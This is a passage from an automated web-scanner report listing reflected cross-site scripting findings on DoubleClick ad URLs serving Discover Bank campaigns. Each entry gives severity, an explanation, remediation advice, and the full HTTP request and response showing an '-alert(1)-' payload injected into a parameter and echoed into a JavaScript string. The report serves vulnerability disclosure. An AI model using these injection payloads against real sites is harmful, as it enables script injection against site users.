Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAAB3LOQ6DMBAF0J9AIiOuQYcGebz7EmmpvYw7Oo6Ug0bK69-KB4CtesNFmCmHkclxFSocBjU9tG-Njeim8Pwsx7Fi-g9XapVgyUqKFLvP1DkIJWc7G5-tTqIwA3FXeAHfS-EN3Cd-r8Yzo3MAAAA%3D%26dst%3Dhttp%253A%252F%252Ffb.discoverbank.com&_wp=AAABMNPcZrHEs0SZL6SRrmS1onK96l7WV18WHg&_nv=1&_CDbg=1822617&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAJnPGwAAAAAAUCoRAQAAAACXkxsAAAAAABZEEQEAAAAA5j4RAQAAAADM0hsAAAAAACFD7EGuR-F6FK7nPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAABiNTIxYWUxMS05NmY5LTQxYmUtYTE2Zi1jMGYwNWNjMTJlMGMkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAS0ctMDAwMDAwMDA1NjgzMTQzODMPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAC4uCU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4921
Date: Tue, 28 Jun 2011 01:29:57 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
var dccreativewidth = '300';
var dcwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=b521ae11-96f9-41be-a16f-c0f05cc12e0c&_o=15619&_eo=97956&_et=1309224494&_a=1822617&_s=11683&_d=179021606df45'-alert(1)-'3a47738f921&_c=1807255&_pm=97956&_pn=17908758&redirect=http%3a%2f%2ffb.discoverbank.com/campaigns/products/savings/201101/index_v1.aspx%3Facmpgn%3D111_X1_300x250_feel_X1FEELA%26src%3DX1FEELA';
var target = '_blan
...[SNIP]...

1.64. http://ad.doubleclick.net/adi/x1.rtb/discoverbank/poem/att [_eo parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/discoverbank/poem/att

Issue detail

The value of the _eo request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7cf8f'-alert(1)-'f8a532e7701 was submitted in the _eo parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/discoverbank/poem/att;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=b521ae11-96f9-41be-a16f-c0f05cc12e0c&_o=15619&_eo=979567cf8f'-alert(1)-'f8a532e7701&_et=1309224494&_a=1822617&_s=11683&_d=17902160&_c=1807255&_pm=97956&_pn=17908758&redirect=;u=17908758;ord=7703464? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAAB3LOQ6DMBAF0J9AIiOuQYcGebz7EmmpvYw7Oo6Ug0bK69-KB4CtesNFmCmHkclxFSocBjU9tG-Njeim8Pwsx7Fi-g9XapVgyUqKFLvP1DkIJWc7G5-tTqIwA3FXeAHfS-EN3Cd-r8Yzo3MAAAA%3D%26dst%3Dhttp%253A%252F%252Ffb.discoverbank.com&_wp=AAABMNPcZrHEs0SZL6SRrmS1onK96l7WV18WHg&_nv=1&_CDbg=1822617&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAJnPGwAAAAAAUCoRAQAAAACXkxsAAAAAABZEEQEAAAAA5j4RAQAAAADM0hsAAAAAACFD7EGuR-F6FK7nPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAABiNTIxYWUxMS05NmY5LTQxYmUtYTE2Zi1jMGYwNWNjMTJlMGMkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAS0ctMDAwMDAwMDA1NjgzMTQzODMPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAC4uCU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4644
Date: Tue, 28 Jun 2011 01:29:19 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
://s0.2mdn.net/2279893/build_osa_300x250.gif';
var dccreativewidth = '300';
var dcwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=b521ae11-96f9-41be-a16f-c0f05cc12e0c&_o=15619&_eo=979567cf8f'-alert(1)-'f8a532e7701&_et=1309224494&_a=1822617&_s=11683&_d=17902160&_c=1807255&_pm=97956&_pn=17908758&redirect=http%3a%2f%2ffb.discoverbank.com/campaigns/products/savings/201007/index.aspx%3Fsrc%3DX1BUILDA';
var target =
...[SNIP]...

1.65. http://ad.doubleclick.net/adi/x1.rtb/discoverbank/poem/att [_et parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/discoverbank/poem/att

Issue detail

The value of the _et request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 590be'-alert(1)-'10e500e253b was submitted in the _et parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/discoverbank/poem/att;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=b521ae11-96f9-41be-a16f-c0f05cc12e0c&_o=15619&_eo=97956&_et=1309224494590be'-alert(1)-'10e500e253b&_a=1822617&_s=11683&_d=17902160&_c=1807255&_pm=97956&_pn=17908758&redirect=;u=17908758;ord=7703464? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAAB3LOQ6DMBAF0J9AIiOuQYcGebz7EmmpvYw7Oo6Ug0bK69-KB4CtesNFmCmHkclxFSocBjU9tG-Njeim8Pwsx7Fi-g9XapVgyUqKFLvP1DkIJWc7G5-tTqIwA3FXeAHfS-EN3Cd-r8Yzo3MAAAA%3D%26dst%3Dhttp%253A%252F%252Ffb.discoverbank.com&_wp=AAABMNPcZrHEs0SZL6SRrmS1onK96l7WV18WHg&_nv=1&_CDbg=1822617&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAJnPGwAAAAAAUCoRAQAAAACXkxsAAAAAABZEEQEAAAAA5j4RAQAAAADM0hsAAAAAACFD7EGuR-F6FK7nPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAABiNTIxYWUxMS05NmY5LTQxYmUtYTE2Zi1jMGYwNWNjMTJlMGMkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAS0ctMDAwMDAwMDA1NjgzMTQzODMPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAC4uCU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4401
Date: Tue, 28 Jun 2011 01:29:28 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
93/DBVault_300x250_Static.gif';
var dccreativewidth = '300';
var dcwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=b521ae11-96f9-41be-a16f-c0f05cc12e0c&_o=15619&_eo=97956&_et=1309224494590be'-alert(1)-'10e500e253b&_a=1822617&_s=11683&_d=17902160&_c=1807255&_pm=97956&_pn=17908758&redirect=http%3a%2f%2ffb.discoverbank.com/campaigns/products/savings/201105/index.aspx%3Fsrc%3DX1PMIA';
var target = '_blank';
var dcb
...[SNIP]...

1.66. http://ad.doubleclick.net/adi/x1.rtb/discoverbank/poem/att [_o parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/discoverbank/poem/att

Issue detail

The value of the _o request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 22438'-alert(1)-'30165b56046 was submitted in the _o parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/discoverbank/poem/att;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=b521ae11-96f9-41be-a16f-c0f05cc12e0c&_o=1561922438'-alert(1)-'30165b56046&_eo=97956&_et=1309224494&_a=1822617&_s=11683&_d=17902160&_c=1807255&_pm=97956&_pn=17908758&redirect=;u=17908758;ord=7703464? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAAB3LOQ6DMBAF0J9AIiOuQYcGebz7EmmpvYw7Oo6Ug0bK69-KB4CtesNFmCmHkclxFSocBjU9tG-Njeim8Pwsx7Fi-g9XapVgyUqKFLvP1DkIJWc7G5-tTqIwA3FXeAHfS-EN3Cd-r8Yzo3MAAAA%3D%26dst%3Dhttp%253A%252F%252Ffb.discoverbank.com&_wp=AAABMNPcZrHEs0SZL6SRrmS1onK96l7WV18WHg&_nv=1&_CDbg=1822617&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAJnPGwAAAAAAUCoRAQAAAACXkxsAAAAAABZEEQEAAAAA5j4RAQAAAADM0hsAAAAAACFD7EGuR-F6FK7nPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAABiNTIxYWUxMS05NmY5LTQxYmUtYTE2Zi1jMGYwNWNjMTJlMGMkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAS0ctMDAwMDAwMDA1NjgzMTQzODMPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAC4uCU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4401
Date: Tue, 28 Jun 2011 01:29:09 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
'http://s0.2mdn.net/2279893/DBVault_300x250_Static.gif';
var dccreativewidth = '300';
var dcwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=b521ae11-96f9-41be-a16f-c0f05cc12e0c&_o=1561922438'-alert(1)-'30165b56046&_eo=97956&_et=1309224494&_a=1822617&_s=11683&_d=17902160&_c=1807255&_pm=97956&_pn=17908758&redirect=http%3a%2f%2ffb.discoverbank.com/campaigns/products/savings/201105/index.aspx%3Fsrc%3DX1PMIA';
var t
...[SNIP]...

1.67. http://ad.doubleclick.net/adi/x1.rtb/discoverbank/poem/att [_pm parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/discoverbank/poem/att

Issue detail

The value of the _pm request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f7318'-alert(1)-'1d7b10ff8e1 was submitted in the _pm parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/discoverbank/poem/att;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=b521ae11-96f9-41be-a16f-c0f05cc12e0c&_o=15619&_eo=97956&_et=1309224494&_a=1822617&_s=11683&_d=17902160&_c=1807255&_pm=97956f7318'-alert(1)-'1d7b10ff8e1&_pn=17908758&redirect=;u=17908758;ord=7703464? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAAB3LOQ6DMBAF0J9AIiOuQYcGebz7EmmpvYw7Oo6Ug0bK69-KB4CtesNFmCmHkclxFSocBjU9tG-Njeim8Pwsx7Fi-g9XapVgyUqKFLvP1DkIJWc7G5-tTqIwA3FXeAHfS-EN3Cd-r8Yzo3MAAAA%3D%26dst%3Dhttp%253A%252F%252Ffb.discoverbank.com&_wp=AAABMNPcZrHEs0SZL6SRrmS1onK96l7WV18WHg&_nv=1&_CDbg=1822617&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAJnPGwAAAAAAUCoRAQAAAACXkxsAAAAAABZEEQEAAAAA5j4RAQAAAADM0hsAAAAAACFD7EGuR-F6FK7nPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAABiNTIxYWUxMS05NmY5LTQxYmUtYTE2Zi1jMGYwNWNjMTJlMGMkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAS0ctMDAwMDAwMDA1NjgzMTQzODMPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAC4uCU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4921
Date: Tue, 28 Jun 2011 01:30:16 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
'300';
var dcwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=b521ae11-96f9-41be-a16f-c0f05cc12e0c&_o=15619&_eo=97956&_et=1309224494&_a=1822617&_s=11683&_d=17902160&_c=1807255&_pm=97956f7318'-alert(1)-'1d7b10ff8e1&_pn=17908758&redirect=http%3a%2f%2ffb.discoverbank.com/campaigns/products/savings/201101/index_v1.aspx%3Facmpgn%3D111_X1_300x250_feel_X1FEELA%26src%3DX1FEELA';
var target = '_blank';
var dcbgcolor = '
...[SNIP]...

1.68. http://ad.doubleclick.net/adi/x1.rtb/discoverbank/poem/att [_pn parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/discoverbank/poem/att

Issue detail

The value of the _pn request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f697a'-alert(1)-'2dcff89fe8 was submitted in the _pn parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/discoverbank/poem/att;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=b521ae11-96f9-41be-a16f-c0f05cc12e0c&_o=15619&_eo=97956&_et=1309224494&_a=1822617&_s=11683&_d=17902160&_c=1807255&_pm=97956&_pn=17908758f697a'-alert(1)-'2dcff89fe8&redirect=;u=17908758;ord=7703464? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAAB3LOQ6DMBAF0J9AIiOuQYcGebz7EmmpvYw7Oo6Ug0bK69-KB4CtesNFmCmHkclxFSocBjU9tG-Njeim8Pwsx7Fi-g9XapVgyUqKFLvP1DkIJWc7G5-tTqIwA3FXeAHfS-EN3Cd-r8Yzo3MAAAA%3D%26dst%3Dhttp%253A%252F%252Ffb.discoverbank.com&_wp=AAABMNPcZrHEs0SZL6SRrmS1onK96l7WV18WHg&_nv=1&_CDbg=1822617&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAJnPGwAAAAAAUCoRAQAAAACXkxsAAAAAABZEEQEAAAAA5j4RAQAAAADM0hsAAAAAACFD7EGuR-F6FK7nPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAABiNTIxYWUxMS05NmY5LTQxYmUtYTE2Zi1jMGYwNWNjMTJlMGMkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAS0ctMDAwMDAwMDA1NjgzMTQzODMPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAC4uCU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4640
Date: Tue, 28 Jun 2011 01:30:25 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
cwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=b521ae11-96f9-41be-a16f-c0f05cc12e0c&_o=15619&_eo=97956&_et=1309224494&_a=1822617&_s=11683&_d=17902160&_c=1807255&_pm=97956&_pn=17908758f697a'-alert(1)-'2dcff89fe8&redirect=http%3a%2f%2ffb.discoverbank.com/campaigns/products/savings/201007/index.aspx%3Fsrc%3DX1BUILDA';
var target = '_blank';
var dcbgcolor = '';
var dcswf = 'http://s0.2mdn.net/2279893/300x250.swf
...[SNIP]...

1.69. http://ad.doubleclick.net/adi/x1.rtb/discoverbank/poem/att [_s parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/discoverbank/poem/att

Issue detail

The value of the _s request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 90f62'-alert(1)-'94227e935c8 was submitted in the _s parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/discoverbank/poem/att;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=b521ae11-96f9-41be-a16f-c0f05cc12e0c&_o=15619&_eo=97956&_et=1309224494&_a=1822617&_s=1168390f62'-alert(1)-'94227e935c8&_d=17902160&_c=1807255&_pm=97956&_pn=17908758&redirect=;u=17908758;ord=7703464? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAAB3LOQ6DMBAF0J9AIiOuQYcGebz7EmmpvYw7Oo6Ug0bK69-KB4CtesNFmCmHkclxFSocBjU9tG-Njeim8Pwsx7Fi-g9XapVgyUqKFLvP1DkIJWc7G5-tTqIwA3FXeAHfS-EN3Cd-r8Yzo3MAAAA%3D%26dst%3Dhttp%253A%252F%252Ffb.discoverbank.com&_wp=AAABMNPcZrHEs0SZL6SRrmS1onK96l7WV18WHg&_nv=1&_CDbg=1822617&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAJnPGwAAAAAAUCoRAQAAAACXkxsAAAAAABZEEQEAAAAA5j4RAQAAAADM0hsAAAAAACFD7EGuR-F6FK7nPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAABiNTIxYWUxMS05NmY5LTQxYmUtYTE2Zi1jMGYwNWNjMTJlMGMkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAS0ctMDAwMDAwMDA1NjgzMTQzODMPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAC4uCU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4644
Date: Tue, 28 Jun 2011 01:29:47 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
0x250.gif';
var dccreativewidth = '300';
var dcwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=b521ae11-96f9-41be-a16f-c0f05cc12e0c&_o=15619&_eo=97956&_et=1309224494&_a=1822617&_s=1168390f62'-alert(1)-'94227e935c8&_d=17902160&_c=1807255&_pm=97956&_pn=17908758&redirect=http%3a%2f%2ffb.discoverbank.com/campaigns/products/savings/201007/index.aspx%3Fsrc%3DX1BUILDA';
var target = '_blank';
var dcbgcolor = '';
var d
...[SNIP]...

1.70. http://ad.doubleclick.net/adi/x1.rtb/discoverbank/poem/att [redirect parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/discoverbank/poem/att

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2b90'-alert(1)-'b8a211ccb10 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

